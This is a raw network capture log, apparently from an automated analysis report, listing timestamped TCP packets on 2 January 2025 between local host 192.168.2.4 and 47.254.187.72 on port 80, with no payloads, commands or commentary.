                                                                            Jan 2, 2025 20:34:58.535556078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.535567999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.535583973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.535608053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.537822962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537834883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537847996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537867069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537869930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.537878990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537893057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537893057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.537904024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.537934065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.537945986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.542924881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.542973995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.542996883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543006897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543026924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543039083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543046951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.543050051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543061972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543076992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.543077946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.543092012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.543123960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564512014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564527035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564538002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564579010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564615965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564626932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564632893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564636946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564647913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564659119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564666033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564668894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564681053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564691067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564702034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564707041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564713001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564723969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564723969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.564753056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.564771891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576112032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576129913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576153994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576174974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576189995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576230049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576231003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576241970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576267004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576282024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576288939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576304913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576316118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.576332092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.576350927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.585201979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585211992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585227966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585238934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585247993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585252047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.585259914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585268021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585283995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585295916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585298061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.585304022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.585321903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.585344076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.587196112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587219000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587228060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587261915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.587275028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587285995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587297916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587299109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.587316990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587327003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587328911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.587337971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.587362051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.587382078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.588009119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588020086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588031054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588052988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.588082075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.588558912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588572025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588582993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588593006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588599920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.588603973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.588628054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.588676929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.589047909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589065075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589077950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589087009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.589109898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.589112043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589124918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589160919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589171886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.589173079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589185953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589194059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.589195013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.589225054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.589248896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.605837107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605881929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.605892897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605904102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605915070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605933905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605936050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.605945110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605957031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605973959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.605978966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606004953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606009007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606015921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606025934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606035948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606053114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606060982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606070995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606070995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606081963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606092930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606093884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606101990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606126070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606153011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606173992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606213093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606237888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606247902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606257915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606271982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606282949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606283903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606295109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606300116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606321096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606327057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606352091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606374025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606707096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606745958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606774092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606784105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606801033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606815100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606817007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606826067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606838942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606851101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.606858969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606879950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.606895924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.613949060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.613966942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.613976955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.613986969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.613993883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.614003897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.614013910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.614021063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.614026070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.614058971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.614070892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.617136955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617175102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.617199898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617208958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617224932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617237091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.617238045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617248058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617259026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617269993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.617271900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.617304087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.622231007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622242928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622255087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622265100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622275114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.622296095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.622308969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622319937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622329950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.622329950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622339010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.622358084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.622390032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.624510050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624528885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624540091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624550104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.624556065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624567986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624577999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.624578953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624589920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624600887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.624619007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.624634981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.629703045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629761934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.629792929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629802942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629820108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629831076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629838943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.629842043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629852057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.629853964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629867077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.629874945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.629893064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.629905939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651384115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651401997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651420116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651431084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651432037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651442051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651448011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651453018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651463985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651473999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651478052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651489973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651500940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651510954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651511908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651523113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651530981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651534081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651546001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.651557922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651570082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.651598930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.662938118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.662981033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.662990093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663000107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663009882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663021088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663028002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.663048983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663050890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.663059950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663070917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.663084030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.663103104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.672220945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672235966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672247887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672257900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672266960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.672269106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672280073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672288895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.672291040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.672322035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.674295902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674308062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674319029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674329042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674340010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674339056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.674350977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674362898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674366951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.674372911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674386978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.674406052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.674981117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.674993038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675003052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675017118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675035000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675043106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675072908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675075054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675088882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675101042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675103903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675112009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675120115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675136089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675915956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675956964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.675964117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675986052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675997019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.675997972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.676006079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.676012039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.676018953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.676026106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.676028013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.676038980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.676053047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.676079988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692648888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692698956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692711115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692719936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692732096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692742109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692743063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692759037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692770004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692780018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692784071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692791939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692800999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692811966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692811966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692823887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692843914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692856073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.692881107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.692889929 CET804973047.254.187.72192.168.2.4
